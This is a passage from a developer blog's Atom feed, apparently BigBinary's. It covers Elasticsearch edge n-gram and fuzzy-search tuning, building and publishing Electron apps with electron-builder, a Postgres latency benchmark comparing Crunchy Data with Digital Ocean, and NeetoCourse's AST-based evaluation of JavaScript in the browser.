&quot;start_offset&quot;: 0,      &quot;end_offset&quot;: 8,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 0    },    {      &quot;token&quot;: &quot;in&quot;,      &quot;start_offset&quot;: 9,      &quot;end_offset&quot;: 11,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 1    },    {      &quot;token&quot;: &quot;the&quot;,      &quot;start_offset&quot;: 12,      &quot;end_offset&quot;: 15,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 2    },    {      &quot;token&quot;: &quot;roo&quot;,      &quot;start_offset&quot;: 16,      &quot;end_offset&quot;: 20,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 3    },    {      &quot;token&quot;: &quot;room&quot;,      &quot;start_offset&quot;: 16,      &quot;end_offset&quot;: 20,      &quot;type&quot;: &quot;&lt;ALPHANUM&gt;&quot;,      &quot;position&quot;: 3    }  ]}</code></pre><p>The <code>edge_ngram</code> filter creates <a href="https://en.wikipedia.org/wiki/N-gram">n-grams</a>starting from the first character. Since we specified <code>min_gram</code> as 3 and<code>max_gram</code> as 20, the filter will create n-grams from the first 3 characters tothe last 20 characters. This means that a document will be created for every 3to 20 letter sequence of a word. If we start typing &quot;ELEP&quot;, then there will be adocument in the index corresponding to &quot;ELEP&quot; and we will get the result&quot;Elephant in the room&quot;.</p><h2>The Query</h2><p>The query object in the search request is equally important for getting relevantresults. Elasticsearch sorts matching search results by <em>relevance score</em>, whichmeasures how well each document matches a query. The query clause contains thecriteria for calculating the relevance score. This is our query object:</p><pre><code class="language-js">{  bool: {    should: [      {        simple_query_string: {          query: requestBody.searchTerm,          fields: [&quot;content&quot;, &quot;meta.pageTitle&quot;, &quot;meta.chapterTitle&quot;],          quote_field_suffix: &quot;.exact&quot;,        },      },      {        match: {          content: {            query: requestBody.searchTerm,            ...baseFuzzyQueryConfig(),          },        },      },      {        match: {          &quot;meta.pageTitle&quot;: {            query: requestBody.searchTerm,            ...baseFuzzyQueryConfig(),            boost: 1.5,          },        },      },      {        match: {          &quot;meta.chapterTitle&quot;: {            query: requestBody.searchTerm,            ...baseFuzzyQueryConfig(),            boost: 1.5,          },        },      },    ],    minimum_should_match: 1,  },};</code></pre><p>The <code>bool</code> and <code>should</code> clauses are used to create a compound query. The<code>should</code> clause means that at least one of the queries should match. Here the<code>match</code> is the standard query used for full-text search. Here <code>content</code>,<code>meta.pageTitle</code> and <code>meta.chapterTitle</code> specify the fields that we createdwhile indexing the data.</p><p>We have provided a <code>boost</code> value of 1.5 for page title and chapter title. Thisis to make sure that a page or chapter title has more relevance score than anycontent in the middle of the page.</p><p>The <code>simple_query_string</code> query is used for exact matches, when the search termcontains double quotes, the <code>english_exact</code> analyzer is used. The double quotesoperator ( <code>&quot;</code> ) is part of the<a href="https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-simple-query-string-query.html#simple-query-string-syntax">several operators</a>that can be used in the <code>simple_query_string</code> query.</p><h3>Fuzzy searching</h3><p>We also use fuzzy searching in the <code>match</code> query. Fuzzy searching helps ingiving proper results even if there are typos in the search term. Elasticsearchuses <a href="https://en.wikipedia.org/wiki/Levenshtein_distance">Levenshtein distance</a>to calculate the similarity between the search term and the indexed data.Previously, we used the<a href="https://www.elastic.co/guide/en/elasticsearch/reference/current/query-dsl-fuzzy-query.html">fuzzy query</a>to implement fuzzy searching.</p><pre><code class="language-js">{  content: {    value: requestBody.searchTerm,    ...extendedFuzzyQueryConfig(),  },},</code></pre><p>But this caused several issues like:</p><ul><li>Fuzzy results being prioritized over exact matches. For example, searching for&quot;five&quot; returned results for &quot;dive&quot;, even when &quot;five&quot; was present in thecontent</li><li>Fuzzy results not being returned when the search term contained multiplewords.</li></ul><p>Upon investigation, we found that the <code>fuzzy</code> query does not perform analysis onthe search term. Instead we now use the <code>match</code> query with <code>fuzziness</code>parameter.</p><pre><code class="language-js">const baseFuzzyQueryConfig = () =&gt; ({  prefix_length: 0,  fuzziness: &quot;AUTO&quot;,});...{  content: {    query: requestBody.searchTerm,    ...baseFuzzyQueryConfig(),  },},</code></pre><h2>Conclusion</h2><p>There is no silver bullet in the case of Elasticsearch configuration. And there isno metric to determine if the search is giving quality results. We have tweakedour configuration based on trial and error and from user feedback. We hope thesetechniques are useful for anyone who is looking to improve their searchexperience.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Building and publishing an Electron application using electron-builder]]></title>
       <author><name>Farhan CK</name></author>
      <link href="https://www.bigbinary.com/blog/publish-electron-application"/>
      <updated>2024-10-22T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/publish-electron-application</id>
      <content type="html"><![CDATA[<p><em>Recently, we built <a href="https://neetorecord.com/neetorecord/">NeetoRecord</a>, a loomalternative. The desktop application was built using Electron. In a series ofblogs, we capture how we built the desktop application and the challenges we raninto. This blog is part 2 of the blog series. You can also read<a href="https://www.bigbinary.com/blog/sync-store-main-renderer-electron">part 1</a>,<a href="https://www.bigbinary.com/blog/video-background-removal">part 3</a>,<a href="https://www.bigbinary.com/blog/electron-multiple-browser-windows">part 4</a>,<a href="https://www.bigbinary.com/blog/code-sign-notorize-mac-desktop-app">part 5</a>,<a href="https://www.bigbinary.com/blog/deep-link-electron-app">part 6</a>,<a href="https://www.bigbinary.com/blog/request-camera-micophone-permission-electron">part 7</a><a href="https://www.bigbinary.com/blog/native-modules-electron">part 8</a> and<a href="https://www.bigbinary.com/blog/ev-code-sign-windows-application-ssl-com">part 9</a>.</em></p><p>Building, packaging and publishing an app with the default Electron npm packagescan be quite challenging. It involves multiple packages and offers limitedcustomization. Additionally, setting up auto-updates requires significantadditional effort, often involving separate tools or services.</p><p><a href="https://www.electron.build/">electron-builder</a> is a complete solution forbuilding, packaging, and distributing <a href="https://electronjs.org/">Electron</a>applications for macOS, Windows, and Linux. It is a highly configurablealternative to the default Electron packaging process that supports auto-updateout of the box.</p><p>In this blog, we look into how we can build, package and distribute Electronapplications using <code>electron-builder</code>.</p><h3>Electron processes</h3><p>Electron has two types of processes: the <code>main</code> process and the <code>renderer</code>process. The main process acts as the entry point to the application, where wecan create a browser window and load a webpage. This webpage runs in the<code>renderer</code> process. The <code>main</code> process is written in <code>Node.js</code>, while therenderer process can be developed using JavaScript or any JS framework like<code>React</code>, <code>Vue</code>, or <code>Angular</code>.</p><h3>Project structure</h3><p>When building an Electron application, it's best to keep the <code>main</code> and<code>renderer</code> processes in separate folders since they are built separately.</p><pre><code class="language-javascript">electron-app assets release src    main      main.js    renderer      App.jsx      index.ejs node_modules package.json</code></pre><h3>Browser window preload script</h3><p>Since the <code>main</code> process is written in <code>Node.js</code>, it has access to <code>Node.js</code> andElectron APIs, but the <code>renderer</code> process does not. To bridge this gap, Electronsupports a special script called a <code>preload</code> script, which we can specify whencreating a <code>BrowserWindow</code>. This script runs in a context that has access toboth the HTML DOM and a limited subset of Node.js and Electron APIs. An example<code>preload</code> script looks like this:</p><pre><code class="language-js">import { contextBridge, ipcRenderer } from &quot;electron&quot;;const electronHandler = {  ipcRenderer: {    sendMessage(channel, ...args) {      ipcRenderer.send(channel, ...args);    },    on(channel, func) {      const subscription = (_event, ...args) =&gt; func(...args);      ipcRenderer.on(channel, subscription);      return () =&gt; {        ipcRenderer.removeListener(channel, subscription);      };    },    once(channel, func) {      ipcRenderer.once(channel, (_event, ...args) =&gt; func(...args));    },  },};contextBridge.exposeInMainWorld(&quot;electron&quot;, electronHandler);</code></pre><p>This preload script exposes <code>send</code>, <code>on</code> and <code>once</code> methods of <code>ipcRenderer</code> tothe renderer process via the <code>contextBridge</code>. It allows the renderer to sendmessages, listen for events, and handle one-time events from the main processwhile maintaining security by controlling which APIs are accessible.</p><h3>Build</h3><p>Since an Electron application has two processes, we need two separate Webpackconfigurationsone for the <code>main</code> process and another for the <code>renderer</code>process.</p><pre><code class="language-js">// ./config/webpack/main.mjsimport path from &quot;path&quot;;import webpack from &quot;webpack&quot;;import { merge } from &quot;webpack-merge&quot;;import TerserPlugin from &quot;terser-webpack-plugin&quot;;const configuration = {  target: &quot;electron-main&quot;,  entry: {    main: &quot;src/main/main.mjs&quot;,    preload: &quot;src/main/preload.mjs&quot;,  },  output: {    path: &quot;release/app/dist/main&quot;,    filename: &quot;[name].js&quot;,    library: {      type: &quot;umd&quot;,    },  },  optimization: {    minimizer: [      new TerserPlugin({        parallel: true,      }),    ],  },  node: {    __dirname: false,    __filename: false,  },};export default configuration;</code></pre><p>The above is a basic Webpack configuration for the <code>main</code> process. Webpacksupports Electron out of the box, so by setting <code>target: &quot;electron-main&quot;</code>,Webpack includes all the necessary Electron variables. Since we also have a<code>preload</code> script, we added <code>preload.mjs</code> as an entry point as well. We will beminifying the code using <code>TerserPlugin</code>.</p><p>Another important detail is that we've disabled <code>__dirname</code> and <code>__filename</code>.This prevents Webpack's handling of these variables from interfering withNode.js's native <code>__dirname</code> and <code>__filename</code>, ensuring they behave as expectedin our Electron app.</p><pre><code class="language-js">// ./config/webpack/renderer.mjsimport path from &quot;path&quot;;import webpack from &quot;webpack&quot;;import HtmlWebpackPlugin from &quot;html-webpack-plugin&quot;;import MiniCssExtractPlugin from &quot;mini-css-extract-plugin&quot;;import { BundleAnalyzerPlugin } from &quot;webpack-bundle-analyzer&quot;;import CssMinimizerPlugin from &quot;css-minimizer-webpack-plugin&quot;;import { merge } from &quot;webpack-merge&quot;;import TerserPlugin from &quot;terser-webpack-plugin&quot;;const configuration = {  target: [&quot;web&quot;, &quot;electron-renderer&quot;],  entry: &quot;src/renderer/App.jsx&quot;,  output: {    path: &quot;release/app/dist/renderer&quot;,    publicPath: &quot;./&quot;,    filename: &quot;renderer.js&quot;,    library: {      type: &quot;umd&quot;,    },  },  module: {    rules: [      {        test: /\.s?(a|c)ss$/,        use: [          MiniCssExtractPlugin.loader,          {            loader: &quot;css-loader&quot;,            options: {              modules: true,              sourceMap: true,              importLoaders: 1,            },          },          &quot;sass-loader&quot;,        ],        include: /\.module\.s?(c|a)ss$/,      },      {        test: /\.s?(a|c)ss$/,        use: [          MiniCssExtractPlugin.loader,          &quot;css-loader&quot;,          &quot;sass-loader&quot;,          &quot;postcss-loader&quot;,        ],        exclude: /\.module\.s?(c|a)ss$/,      },      // Fonts      {        test: /\.(woff|woff2|eot|ttf|otf)$/i,        type: &quot;asset/resource&quot;,      },      // Images      {        test: /\.(png|jpg|jpeg|gif)$/i,        type: &quot;asset/resource&quot;,      },      // SVG      {        test: /\.svg$/,        use: [          {            loader: &quot;@svgr/webpack&quot;,            options: {              prettier: false,              svgo: false,              svgoConfig: {                plugins: [{ removeViewBox: false }],              },              titleProp: true,              ref: true,            },          },          &quot;file-loader&quot;,        ],      },    ],  },  optimization: {    minimize: true,    minimizer: [new TerserPlugin(), new CssMinimizerPlugin()],  },  plugins: [    new MiniCssExtractPlugin({      filename: &quot;style.css&quot;,    }),    new HtmlWebpackPlugin({      filename: &quot;index.html&quot;,      template: &quot;src/renderer/index.ejs&quot;,      minify: {        collapseWhitespace: true,        removeAttributeQuotes: true,        removeComments: true,      },      isBrowser: false,      isDevelopment: false,    }),  ],};export default configuration;</code></pre><p>In the <code>renderer</code> configuration, we set the target to<code>target: [&quot;web&quot;, &quot;electron-renderer&quot;]</code>, which provides both standard web andElectron's renderer variables. Similar to a typical web application setup, weload various plugins to handle fonts, images, and SVGs and to minify CSS andJavaScript. Since JavaScript files are loaded locally in an Electronapplication, we can bundle everything into a single file called <code>renderer.js</code>instead of splitting it into multiple chunks as we would for a standard webapplication.</p><p>Our build configuration is ready; add it to <code>scripts</code> in <code>package.json</code> for easyexecution.</p><pre><code class="language-json">&quot;scripts&quot;: {    &quot;build:main&quot;: &quot;cross-env NODE_ENV=production webpack --config ./config/webpack/main.mjs&quot;,    &quot;build:renderer&quot;: &quot;cross-env NODE_ENV=production webpack --config ./config/webpack/renderer.mjs&quot;,    &quot;build&quot;: &quot;yarn build:main &amp;&amp; yarn build:renderer&quot;,}</code></pre><p>Great! Now, we can build the entire Electron application using a single<code>yarn build</code> command.</p><h3>Package</h3><p>We can configure the <code>electron-builder</code> in <code>package.json</code> using the <code>build</code>field. Below is an example configuration for an app named <code>MyApp</code>.</p><pre><code class="language-json"> &quot;build&quot;: {    &quot;productName&quot;: &quot;MyApp&quot;,    &quot;appId&quot;: &quot;com.neeto.MyApp&quot;,    &quot;directories&quot;: {      &quot;app&quot;: &quot;release/app&quot;,      &quot;buildResources&quot;: &quot;assets&quot;,      &quot;output&quot;: &quot;release/build&quot;    },     &quot;mac&quot;: {      &quot;target&quot;: {        &quot;target&quot;: &quot;default&quot;,        &quot;arch&quot;: [          &quot;arm64&quot;,          &quot;x64&quot;        ]      }    },    &quot;win&quot;: {      &quot;target&quot;: {        &quot;target&quot;: &quot;nsis&quot;,        &quot;arch&quot;: [          &quot;x64&quot;        ]      },      &quot;artifactName&quot;: &quot;${productName}-Setup-${version}.${ext}&quot;    },    &quot;linux&quot;: {      &quot;category&quot;: &quot;Utility&quot;,      &quot;target&quot;: [        {          &quot;target&quot;: &quot;rpm&quot;,          &quot;arch&quot;: [            &quot;x64&quot;          ]        },        {          &quot;target&quot;: &quot;deb&quot;,          &quot;arch&quot;: [            &quot;x64&quot;          ]        }      ],    }, }</code></pre><p>In the Webpack configuration, we specified <code>release/app</code> as the output directoryfor the compiled JS code. This directory needs to be specified in<code>electron-builder</code> so it knows where to find the compiled code during packaging.Use the <code>directories.app</code> field to specify this path, and we can also definewhere the packaged builds should be output using the <code>directories.output</code> field.</p><p>In addition to <code>directories</code>, the configuration includes settings for <code>appId</code>,<code>productName</code> and platform-specific configurations for <code>mac</code>, <code>win</code>(Windows),and <code>linux</code>. For each platform, we specify the installer target andarchitecture. This configuration will produce builds for both Intel (<code>x64</code>) andApple Silicon (<code>arm64</code>) on <strong>macOS</strong>. For <strong>Windows</strong>, it generates an <code>NSIS</code>installer targeting 64-bit architecture (<code>x64</code>). On <strong>Linux</strong>, it produces both<code>RPM</code> and <code>DEB</code> installers for 64-bit architecture (<code>x64</code>).</p><p>With the <code>electron-builder</code> configuration set, we can proceed to package ourapplication using the <code>electron-builder build</code> command.</p><pre><code class="language-json">&quot;scripts&quot;: {    &quot;build:main&quot;: &quot;cross-env NODE_ENV=production webpack --config ./webpack/main.prod.mjs&quot;,    &quot;build:renderer&quot;: &quot;cross-env NODE_ENV=production webpack --config ./webpack/renderer.prod.mjs&quot;,    &quot;build&quot;: &quot;yarn build:main &amp;&amp; yarn build:renderer&quot;,    &quot;package&quot;: &quot;yarn build &amp;&amp; electron-builder build&quot;,}</code></pre><p>We run <code>yarn build</code> before <code>electron-builder build</code> to ensure that theJavaScript code is compiled before packaging. This enables us to handle both thebuild and packaging processes in a single command.</p><h3>Publish</h3><p>To publish the app to a server where users can download and use it, we can passthe <code>--publish</code> flag to <code>electron-builder build</code> command. Before we can do that,we need to update our <code>electron-builder</code> configuration with <code>publish</code> serverinformation.</p><p>Here is an example configuration to publish the builds to an S3 bucket named<code>my-app-downloads</code>:</p><pre><code class="language-json"> &quot;build&quot;: {  // other configs  &quot;publish&quot;: [      {        &quot;provider&quot;: &quot;s3&quot;,        &quot;bucket&quot;: &quot;my-app-downloads&quot;,        &quot;path&quot;: &quot;/electron/my-app/&quot;,        &quot;region&quot;: &quot;us-east-1&quot;,        &quot;acl&quot;: null      },    ] }</code></pre><p>The <code>publish</code> field accepts an array, allowing us to publish to multiplelocations. We need to specify a provider, such as <code>s3</code>, but <code>electron-builder</code>also supports other providers like <code>github</code> and more by default. For a completelist of all publishing options, check out the<a href="https://www.electron.build/configuration/publish">publish documentation</a>.</p><p>To wrap things up, let's automate the deployment process by creating a GitHubActions workflow. Since building macOS apps is only supported on macOS, we'llneed to run the workflow from a macOS environment.</p><pre><code class="language-yml">name: Publishjobs:  publish:    runs-on: ${{ matrix.os }}    strategy:      matrix:        os: [macos-latest]    steps:      - name: Setup Java        uses: actions/setup-java@v3        with:          distribution: &quot;adopt&quot;          java-version: &quot;11&quot;      - name: Checkout git repo        uses: actions/checkout@v3      - name: Install Node and NPM        uses: actions/setup-node@v3        with:          node-version: 20          cache: npm      - name: Install rpm using Homebrew        run: brew install rpm      - name: Install and build        run: |          yarn install          yarn build      - name: Publish releases        env:          AWS_ACCESS_KEY_ID: ${{secrets.AWS_ACCESS_KEY}}          AWS_SECRET_ACCESS_KEY: ${{secrets.AWS_SECRET}}        run: npm exec electron-builder -- --publish always -mwl</code></pre><p>To successfully build for Windows and Linux from macOS, we'll need to set up aJava version and install the <code>rpm</code> package. Additionally, configure our<code>AWS_ACCESS_KEY_ID</code> and <code>AWS_SECRET_ACCESS_KEY</code> for the S3 bucket where we planto upload the builds. Once these steps are complete, we should be able to buildand publish our Electron app using the <code>electron-builder -- --publish</code> command.The <code>-mwl</code> flag indicates that the build should target macOS, Windows, andLinux.</p><h3>Auto-update</h3><p>To enable auto-updating for our application, we first need to code-sign andnotarize it. We'll cover the code-signing and notarization details in upcomingblog posts. Stay tuned!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Benchmarking Crunchy Data for latency]]></title>
       <author><name>Vishnu M</name></author>
      <link href="https://www.bigbinary.com/blog/crunchy-bridge-vs-digital-ocean"/>
      <updated>2024-10-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/crunchy-bridge-vs-digital-ocean</id>
      <content type="html"><![CDATA[<p>In Rails World 2024, DHH unveiled <a href="https://kamal-deploy.org/">Kamal 2</a> in his<a href="https://www.youtube.com/watch?v=-cEn_83zRFw">opening keynote</a>. Now, folks wantto give Kamal a try, but some people are worried about the data. They want totake one step at a time, and they feel more comfortable if their database ismanaged by someone else.</p><p>That's where <a href="https://www.crunchydata.com/">Crunchy Data</a> comes in. They providemanaged Postgres service. Checkout this<a href="https://x.com/dhh/status/1840901376182009900">tweet</a> from DHH about CrunchyData.</p><p>In our internal discussion, one of the BigBinary engineers brought up the issueof &quot;latency&quot;. Since the PostgreSQL server will not be in the same data center,what would be the latency? How much impact will it have on performance?</p><p>We didn't know the answer so we thought we would do some benchmarking.</p><h2>Benchmarking</h2><p>To do the comparison we needed another hosting provider where we can runPostgreSQL on the same data center. We chose to work with Digital Ocean.</p><p>To compare the two services, we wrote a benchmark script in Ruby similar to theone <a href="https://x.com/benbjohnson">Ben Johnson</a> wrote in<a href="https://github.com/benbjohnson/production-sqlite-go/blob/main/postgres-tests/postgres_test.go">Go</a>for his <a href="https://youtu.be/XcAYkriuQ1o?si=vz-sYjevztb_bnwL">GopherCon talk</a>in 2021.</p><p>In this benchmark, we're using Ruby's Benchmark module to measure theperformance of a series of database operations. Here's what the code does:</p><ol><li><p>It establishes a connection to the database only once, at the beginning ofthe script. This is done outside the benchmarked operations becauseestablishing connections can be a slow operation because of TLS negotiation,and we don't want to account for that time in our measurements.</p></li><li><p>It then performs the following operations 10,000 times, measuring each one:</p><ul><li>Drops a table named 't' if it exists.</li><li>Creates a new table 't' with two columns: 'id' (an auto-incrementingprimary key) and 'name' (a text field).</li><li>Inserts a single row into the table with the name 'jane'.</li><li>Selects the 'name' from the table where the 'id' is 1 (which should be'jane').</li></ul></li><li><p>After all 10,000 iterations, it calculates and prints the average time foreach operation in microseconds.</p></li></ol><pre><code class="language-ruby">require &quot;pg&quot;require &quot;benchmark&quot;class PostgresBenchmark  def initialize(connection_string)    @conn = PG.connect(connection_string)  end  def run(iterations = 10_000)    total_times = Hash.new { |h, k| h[k] = 0 }    iterations.times do |i|      puts &quot;Running iteration #{i + 1}&quot; if (i + 1) % 1000 == 0      times = benchmark_operations      times.each { |key, time| total_times[key] += time }    end    average_times = total_times.transform_values { |time| time / iterations }    print_results(average_times, iterations)  ensure    @conn.close if @conn  end  private  def benchmark_operations    times = {}    times[:drop] = Benchmark.measure { @conn.exec(&quot;DROP TABLE IF EXISTS t&quot;) }.real    times[:create] = Benchmark.measure { @conn.exec(&quot;CREATE TABLE t (id SERIAL PRIMARY KEY, name TEXT)&quot;) }.real    times[:insert] = Benchmark.measure { @conn.exec(&quot;INSERT INTO t (name) VALUES ('jane')&quot;) }.real    times[:select] = Benchmark.measure do      result = @conn.exec(&quot;SELECT name FROM t WHERE id = 1&quot;)      raise &quot;Unexpected result&quot; unless result[0][&quot;name&quot;] == &quot;jane&quot;    end.real    times  end  def print_results(times, iterations)    total_time = times.values.sum    puts &quot;\nAVERAGE ELAPSED TIME (over #{iterations} iterations)&quot;    puts &quot;drop    #{(times[:drop] * 1_000_000).round(2)} microseconds&quot;    puts &quot;create  #{(times[:create] * 1_000_000).round(2)} microseconds&quot;    puts &quot;insert  #{(times[:insert] * 1_000_000).round(2)} microseconds&quot;    puts &quot;select  #{(times[:select] * 1_000_000).round(2)} microseconds&quot;    puts &quot;TOTAL   #{(total_time * 1_000_000).round(2)} microseconds&quot;  endendif __FILE__ == $0  connection_string = &quot;&lt;DB_CONNECTION_STRING&gt;&quot;  benchmark = PostgresBenchmark.new(connection_string)  benchmark.run(10_000)end</code></pre><h2>Database Specifications and Setup</h2><h3>Digital Ocean</h3><ul><li>Region: NYC3 data center</li><li>Specs: 2 vCPU, 4GB Memory</li><li>Price: $60 per month</li></ul><h3>Crunchy Data</h3><ul><li>Provider: AWS</li><li>Region: us-east-1</li><li>Specs: 2 vCPU, 4GB Memory (hobby-4 plan)</li><li>Price: $70 per month</li></ul><p>We provisioned a Digital Ocean droplet in the NYC3 data center and invoked thebenchmark script from the machine. The Digital Ocean database was also in thesame NYC3 data center. For Crunchy Data, the availability zone selected was<code>us-east-1</code> as it was the closest to NYC3.</p><h2>Benchmarking results</h2><h3>Digital Ocean</h3><pre><code class="language-js">AVERAGE ELAPSED TIME (over 10000 iterations)drop    3448.07 microsecondscreate  5048.39 microsecondsinsert  891.81 microsecondsselect  584.17 microsecondsTOTAL   9972.44 microseconds</code></pre><h3>Crunchy Data</h3><pre><code class="language-js">AVERAGE ELAPSED TIME (over 10000 iterations)drop    10097.89 microsecondscreate  16818.63 microsecondsinsert  8416.35 microsecondsselect  7211.42 microsecondsTOTAL   42544.29 microseconds</code></pre><h2>Benchmarking analysis</h2><p>The results of this benchmark do not come as a surprise. Digital Ocean isperforming significantly better than Crunchy Data. This performance differencecan be primarily attributed to network latency.</p><p><em>Network latency</em> refers to the round-trip time (RTT) it takes for the data totravel from its source to its destination and back again across a network. Inthe context of database operations, it's the time taken for a query to be sentfrom the client to the database server and for the response to return to theclient.</p><p>In our benchmarking, the Digital Ocean database and the client machine invokingthe script were both located in the same data center (NYC3), resulting inminimal network latency. On the other hand, the Crunchy Data database was hostedin AWS <code>us-east-1</code>, and it had to communicate across a greater physicaldistance, adding to latency.</p><p>To get a more accurate value for the network latency, we can compare the averagetime taken to run the <code>SELECT</code> operation. The <code>SELECT</code> operation in the scriptis a point query. <em>A point query refers to type of query that retrieves one orseveral rows based on a unique key</em>.</p><p>In our script, it retrieves a single <code>name</code> value from the table <code>t</code> where the<code>id</code> is <code>1</code>(which is the primary key), and is very fast to execute. Thus, thetime taken to execute the <code>SELECT</code> operation can give us an approximate valuefor the network latency.</p><pre><code>db_time = network_latency + query_execution_time</code></pre><p>For point queries, the <code>query_execution_time</code> is almost zero so all the timetaken is pretty much &quot;network latency&quot;.</p><pre><code>db_time  network_latency</code></pre><p>If we look at the benchmarking result, then we can see that for &quot;select&quot;operation time taken by Digital Ocean is &quot;584 microseconds&quot; and for Crunchy Datait is &quot;7211 microseconds&quot;.</p><p>The difference in network latency is <em>6627 microseconds</em>. That is 6.6milliseconds.</p><p>This value over multiple queries can add up and can have a significant impact onthe overall response time of your application. To put this into perspective, fora web application that makes 10 sequential database queries to render a page,this could add up to about <em>66 milliseconds</em> to the page load time. Now, thiscould be an acceptable limit if your page loads in 3/4 seconds. However,if you are trying to load your page in 200 millisecond,s then you need to watchout.</p><p>Ensuring that the database is always up and it's properly backed up is a non-trivialproblem. Latency notwithstanding, Crunchy Data takes care of running the database.This gives us peace of mind and allows us to exit the cloud one step at a time.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Evaluating JavaScript code in the browser]]></title>
       <author><name>Sayooj Surendran</name></author>
      <link href="https://www.bigbinary.com/blog/evaluating-javascript-in-neeto-course"/>
      <updated>2024-10-08T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/evaluating-javascript-in-neeto-course</id>
      <content type="html"><![CDATA[<p><a href="https://www.neeto.com/neetocourse">NeetoCourse</a> allows anyone to buildinteractive courses where they can add code blocks and assessments. This allowsthe user to run their code, see the output and check if their solution iscorrect or not. Check out<a href="https://courses.bigbinaryacademy.com/learn-javascript/array/challenge-create-array/">Bigbinary Academy's JavaScript course</a>to see this in action.</p><p>Let's see how we evaluate JavaScript code and check if the output matches thecorresponding solution.</p><h2>Synchronous code</h2><p>For a simple synchronous code, the first thing we need to check is if everythinglogged by the user is the same as that of the solution code. What we do here isaggregate all the logs to an array and then compare that array with the arraygenerated by the solution code. This is done by transforming the code using an<a href="https://www.npmjs.com/package/abstract-syntax-tree">AST library</a></p><p>Take this<a href="https://courses.bigbinaryacademy.com/learn-javascript/variables/challenge-variables/">exercise</a>as an example.</p><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/code1.png" alt="code"></p><p>Now let's see the transformed code.</p><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/transformed1.png" alt="transformed"></p><p>Here <code>pushTologs</code> replaces the <code>console.log</code> function and <code>logsAggregator</code> is anarray that stores all the logs. We also replace <code>throw</code> statements with<code>pushToLogs</code> to evaluate exceptions.</p><p>We also perform serialization to make comparison easier. The transformed code isthen ran as an<a href="https://www.bigbinary.com/videos/learn-javascript/immediately-invoked-function-expression">IIFE</a>and the result is used for comparison.</p><p>We run the user submitted code in an iframe so that any bug in the submittedcode doesn't mess up the page.</p><h2>How code is transformed</h2><p>Let's see how this &quot;code transformation&quot; works. We mentioned the use of an<a href="https://www.npmjs.com/package/abstract-syntax-tree">AST library</a>. AST(abstractsyntax tree) is a tree representation of the code which helps the compiler tounderstand the structure of the code. Let's use a tool called<a href="https://astexplorer.net/">AST Explorer</a> to see how the AST looks like for thebelow code.</p><pre><code class="language-js">const priceOfPencil = 5;console.log(&quot;Price of 1 pencil:&quot;);console.log(priceOfPencil);</code></pre><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/astexplorer-2.png" alt="astexplorer"></p><p>Here, <code>MemberExpression</code> is a node and in that node we can use <code>object.name</code>.See the underline highlights using pink color.</p><p>Using <code>object.name</code> we can get to value <code>console</code>. See the green arrow.</p><p>Similarly using <code>property.name</code> we can get to <code>log</code>.</p><p>Now our goal is to walk the tree and replace all <code>console.log</code> statements with<code>pushToLogs</code> statement. For walking and replacing the value we will use the<code>replace</code> function provided by the library.</p><pre><code class="language-js">replace(tree, node =&gt; {  const { callee } = node;  // create the node that needs to be put instead of console.log  const pushToLogsExpression = parse(&quot;pushToLogs()&quot;).body[0].expression;  // check for the console.log node  if (    callee?.type === &quot;MemberExpression&quot; &amp;&amp;    callee?.object?.name === &quot;console&quot; &amp;&amp;    callee?.property?.name === &quot;log&quot;  ) {    pushToLogsExpression.arguments = node.arguments;    node = pushToLogsExpression;  }  return node;});</code></pre><p>Here we are creating a new node by parsing the string <code>&quot;pushToLogs()&quot;</code>. We arethen adding the arguments of the <code>console.log</code> to the <code>pushToLogs</code> node. When wereturn this new node, the code transformation is complete.</p><h2>Asynchronous code</h2><p>Evaluating async code is a bit tricky since we won't get the output of the coderight away. What we do in this case is transform the code to make itsynchronous. For evaluating the output, these are the information we need:</p><ol><li>Console logs</li><li>Exceptions</li><li>The order in which the code needs to be executed</li></ol><p>We will transform the code in such a way that this information are available tous. Let's see how the code is transformed in the following cases:</p><h3>SetTimeout / SetInterval</h3><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/code2.png" alt="code"></p><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/transformed2.png" alt="transformed"></p><p>In this case the function that needs to be executed after the specified timeoutis executed inline. And the delay value is just added to the <code>logsAggregator</code>for record keeping. There will be no delay in the evaluation.</p><p>We do the same for <code>setInterval</code>.</p><p>In both the cases we evaluate the function &quot;inline&quot; and then compare theconsole.log outputs.</p><p>What if we want an exercise involving <code>clearTimeout</code> ? We simply add<code>Timeout cleared</code> to the <code>logsAggregator</code>.</p><h3>Promises</h3><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/code3.png" alt="code"></p><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/transformed3.png" alt="transformed"></p><p>Without going too much in details, to evaluate Promises all we did was move thecallbacks from the <code>then</code> method of the promise to the arguments of a function.</p><p>We handle <code>async/await</code> code in a similar style.</p><p>What happens in the case of promise chaining?</p><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/code5.png" alt="code"></p><p><img src="/blog_images/2024/evaluating-javascript-in-neeto-course/transformed5.png" alt="transformed"></p><p>Here, if we detect that there are more than one <code>then</code> calls, then the secondbody of <code>then</code> is passed as <code>resolveFn</code> to the function that the first <code>then</code>returns. This can go multiple levels based on the chaining.</p><p>In other words, we go back to adding &quot;callbacks&quot;.</p><p>This is how we evaluate JavaScript in NeetoCourse. We evaluate HTML, CSS and SQLsimilarly on the browser. We have also recently added the evaluation of HTMLCanvas. Evaluation of HTML Canvas animations is on the roadmap. But these can bea story for another day.</p><p>Want to see code evaluation in action. Checkout<a href="https://courses.bigbinaryacademy.com/learn-javascript/challenges-set-4/find-second-largest-value-in-array/">this question</a>from our JavaScript course.</p><p>Interested to know more about NeetoCourse? Follow<a href="https://twitter.com/NeetoCourse">@NeetoCourse</a> to see what we're up to.</p>]]></content>
    </entry><entry>
